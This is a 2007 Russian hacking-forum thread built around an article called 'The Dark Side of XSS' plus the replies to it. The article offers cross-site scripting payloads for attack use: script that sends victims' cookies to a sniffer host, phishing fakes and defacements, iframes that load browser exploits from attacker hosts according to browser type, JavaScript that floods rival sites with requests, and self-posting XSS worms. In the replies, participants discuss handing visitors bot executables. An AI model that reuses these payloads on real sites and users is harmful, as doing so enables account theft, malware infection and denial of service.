ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Темная сторона Xss
  #1  
Старый 16.06.2007, 03:43
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию Темная сторона Xss

Интро
Статья уже давно готовилась мной, ее предтече стало ВОТ ЭТО голосование, в котором многие заявили что xss это уязвиость вчеращнего дня, сейчас я попытаюсь опровергнуть это утверждение Основная масса людей считают что xss может использоваться только для кражи cookies, либо исключительно ради эстетического удовольствия лицезрения красивых окошек с различными надписями))
В этой статье я не буду рассматривать сложные xss вектора и не буду расписывать различные способы обхода фильтрации, различные формы построения вектора, вложенные скрипты- обо всем этом можно почитать совершив поиск по форуму

План

Говорить будем по следующему плану, постораюсь осветить все хитрости cross site scripting

1)Кража куков
2)Фейк\Дефейсы
3)Троянизация удаленного юзера
4)ДДос
5)xss черви
6)Менее используемые методы

Мэйн

1
Итак самое распространенный и самое юзаемый вид xss атак:
Интеграция xss вектора( читай яваскрипт кода ), который выполняясь в браузере клиента отсылает куки на снифер, далее происходит подмена авторизационных данных, ну а дальше Садом и Гомора на любой вкус)) (читай - делай что хочешь)

Напомню самые простые конструкции xss векторов приминимых в любом браузере

Код:
<script>document.location="SNIFFER"+document.cookie</script>
<script>img=new Image();img.src="SNIFFER"+document.cookie</script>
2
Некотрые просто уверены, что кроме шутливого дефейса ничего сделать нельзя Что ж иногда даже в таком дефейсе есть некий шарм, например деф сделаный мной на каком то кинемотографическом портале Вектор можно посмотреть здесь:
PHP код:
 http://c0nstantine.jino-net.ru/xss.txt 
Кому то может показаться забавным, но вот поддельная новость на сайти Файненшанал таймс ( xss там есть ), это уже будет не очень смешно

С другой строны фейк метод позволяет получить вожделенный пароль не очень опытного пользователя. Чаще всего юзается такой способ: пользователь редиректится на фейковую страничку, предворительно подготовленную, с схожим с основным ресурсом урлом (например ranbler). С другой стороны, даже в известном журнале Хацкер, упоминали о возможной подмене адресной строки в браузере по средствам нами любимого Яваскрипта, что заметно улучшает внешний вид фейка(http://www.securitylab.ru/vulnerability/291585.php)))
Так же можно действовать методом связаных xss веторов, вообщем действуйте по обстоятельствам

С другой стороны можно использовать обьект яваскрипт - XMLHTTPrequeset, в таком случае работает php снифер и сформированый xss вектор, который с поомощью XMLHTTPrequeset передает интересующую нас информацию об удаленном пользователе:

Код:
function HTTPRequest (url)

{

if (window.XMLHttpRequest) {

req = new XMLHttpRequest();

req.onreadystatechange = processReqChange;

req.open("GET", url, true);

req.send(null);

} else if (window.ActiveXObject) {

req = new ActiveXObject("Microsoft.XMLHTTP");

if (req) {

req.onreadystatechange = processReqChange;

req.open("GET", url, true);

req.send();

}

}

return (req.responseText);

}


var XSSCode = HTTPRequest ("http://hacker-site.com/xss.php");


3
Пожалуй наиболее опасный способ использования xss: Троянизация производится посредством использования эксплойтов для популярных браузеров. Чтобы убить сразу двух зайцев, используем уже приевшийся Яваскрипт)). А именно navigator.appNAME.
Составляем приблизительно следующий вектор:
Код:
<script language="JavaScript">
if(navigator.appName == 'Браузер1')document.write('<iframe src="сплойт для бразуера1">');
if(navigator.appName == 'Браузер2')document.write('<iframe src="сплойт для бразуера2">');
if(navigator.appName == 'Браузер3')document.write('<iframe src="сплойт для бразуера3">');
</script>
можно юзать какие-то более изысканные конструкции, но, имхо, так вполне функционально, понятно что этот вектор слишком грамоздкий чтобы его интегрировать в тело документа напрямую: создаем файлик blabla.js с данным кодом и далее используем конструкцию:
PHP код:
<script src="http://oursite/blabla.js"></script
Если речь идет о работе только с одним видом браузера, то можно использовать облегченную конструкцию
PHP код:
<iframe src="сплойт для браузера"></script


4
ДДос(мемберы МОА и выше не читают этот раздел=)))

Сразу надо оговориться, что для использования такого типа ДДоса и получения "неформального" ботнета, страничка с интегрированым кодом должна быть достаточно посещаемой =)
Используем тот же метод что и во втором пункте

Код:
<script language="javascript">
var req;
var targets = new Array("http://конкурент1","http://конкурент2");// Создаем массив, куда помещаем будущих неудачников 
function SendHTTP(url) {
    req = false;
    if (window.XMLHttpRequest) { //  не ИЕ
        req = new XMLHttpRequest();
    } else if (window.ActiveXObject) { // ИЕ
        req = new ActiveXObject("Microsoft.XMLHTTP");
    }
    if (req) {
            req.open("GET", url, true);
            req.send();
    }
}
function terror() {
     for (i=0;i<targets.length;i++) {
          SendHTTP(targets[i]);
          }
}
</script>
Так же создаем файлик с данным кодом и инжектим вектор с помощью
PHP код:
<script src="http://oursite.ru/zloy.js"></script
5
xss черви очень любопытный вид xss атаки, все же требует использования активных xss: перманентное размещение на сервере и отсутствие необходимости рекламить страничку с интегрированым кодом, а ваш заикссесеный профиль или тему будут просматривать гораздо чаще, чем сформированый и разосланый линк(хотя тоже можно юзать). Естественно каждый попавший в заиксесенную ловушку выполнит в браузере злонамеренный код, фокус червя в том, что он вдобавок ко всему может сам себя постить на форуме или в блоге, снова

используем XMLHttpRequest.


Код:
function HTTPRequest (url)

{

if (window.XMLHttpRequest) {  // не ИЕ

req = new XMLHttpRequest();

req.onreadystatechange = processReqChange;

req.open("GET", url, true);
вы
req.send(null);


} else if (window.ActiveXObject) {  //ИЕ

req = new ActiveXObject("Microsoft.XMLHTTP");

if (req) {

req.onreadystatechange = processReqChange;

req.open("GET", url, true);

req.send();

}

}

}



При этом ничто не мешает совместит DDos атаки и код xss червя...
Внедряем в код xss вектора скрипт для отправки сообщений и вот пошла рассылка спама. Вообщем делайте что в голову всбредет и до чего руки дотянутся. Благо все выложенные мной скрипты публичны и скомбинировать их, создать цепочки выполняемых кодов врят ли составит труда.

6

Напоследок несколько слов о наименее используемых видах атак, вкратце.

Раскрутка заказного сайта: соответсвенно реализуеться так же как и ДДос
Подмена личной информции пользователя: в теории то возможно, сейчас пытаюсь понять реализацию, как только разберусь- допишу


Энд


В качестве финального слова скажу, что использования активных xss более уместно при выполнение какого то из этих пунктов.

Спасибо за внимание

Снял видео по теме, можно посмотреть
PHP код:
 http://filefront.jino-net.ru/xss.rar 
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Последний раз редактировалось Constantine; 26.03.2008 в 02:38..
 
Ответить с цитированием

  #2  
Старый 16.06.2007, 06:35
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Ничего нового не узнал...
Про ддос вообще бред...сколько же надо лохов найти =\
Да и все что здесь написано также можно найти с помощью поиска
 
Ответить с цитированием

  #3  
Старый 16.06.2007, 07:17
Аватар для KEZ
KEZ
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233

Репутация: 2726


По умолчанию

насчет ддос,
если страничка посещаемая, то вместо твоего скрипта проще засунуть эксплойт и лить exe с ботом посетителям
что за бред...
 
Ответить с цитированием

  #4  
Старый 16.06.2007, 08:28
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Цитата:
Сообщение от KEZ  
насчет ддос,
если страничка посещаемая, то вместо твоего скрипта проще засунуть эксплойт и лить exe с ботом посетителям
что за бред...
автор в пункте 3 написал как-то об этом..
 
Ответить с цитированием

  #5  
Старый 16.06.2007, 12:03
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Цитата:
Сообщение от KEZ  
насчет ддос,
если страничка посещаемая, то вместо твоего скрипта проще засунуть эксплойт и лить exe с ботом посетителям
что за бред...
Насчет ДДос, мой яваскрипт выполниться в любом браузере, а вот достать экспойт с хорошим пробивом даже для IE сейчас трудновато =\
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #6  
Старый 16.06.2007, 12:38
Аватар для gemaglabin
gemaglabin
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825

Репутация: 4451


По умолчанию

Тема не освещена и на 50 процентов , иди дорабатывай.
 
Ответить с цитированием

  #7  
Старый 16.06.2007, 13:24
Аватар для _Great_
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610

Репутация: 4360


Отправить сообщение для _Great_ с помощью ICQ
По умолчанию

Тема сисек не раскрыта. Бузя раскрыл лучше
 
Ответить с цитированием

  #8  
Старый 16.06.2007, 15:47
Аватар для KSURi
KSURi
Постоянный
Регистрация: 06.06.2006
Сообщений: 515
Провел на форуме:
1985206

Репутация: 963


По умолчанию

Кстати зря насчет ддос через фреймы ругались... Неплохо работает
 
Ответить с цитированием

  #9  
Старый 16.06.2007, 18:15
Аватар для pento
pento
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137

Репутация: 66
По умолчанию

Цитата:
Сообщение от Constantine  
Интро
С другой стороны можно использовать обьект яваскрипт - XMLHTTPrequeset, в таком случае работает php снифер и сформированый xss вектор, который с поомощью XMLHTTPrequeset передает интересующую нас информацию об удаленном пользователе:

Код:
function HTTPRequest (url)

{

if (window.XMLHttpRequest) {

req = new XMLHttpRequest();

req.onreadystatechange = processReqChange;

req.open("GET", url, true);

req.send(null);

} else if (window.ActiveXObject) {

req = new ActiveXObject("Microsoft.XMLHTTP");

if (req) {

req.onreadystatechange = processReqChange;

req.open("GET", url, true);

req.send();

}

}

return (req.responseText);

}


var XSSCode = HTTPRequest ("http://hacker-site.com/xss.php");
А что уже можно с помощью XMLHttpRequest() делать запросы на "чужой" сайт? В смысле со страницы http://ya.ru c помощью этого объекта делать запросы на http://xacker.com?

uncaught exception: Permission denied to call method XMLHttpRequest.open

P.S. XSS вектор - какое-то странное определение...имхо

Последний раз редактировалось pento; 16.06.2007 в 18:25..
 
Ответить с цитированием

  #10  
Старый 16.06.2007, 22:48
Аватар для Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Чтобы получить информацию от пользователя зарегестрированного на http://ya.ru, тебе нужна xss непосредственно на ya.ru
Открой учебник по Яваскрипту и почитай про обьект XMLHttpRequest
Xss вектор это оригинальное определение, оно мне нраится, я считаю его подходящим
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
Помогите разобраться с Xss *.exe Уязвимости 4 31.03.2007 12:36
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ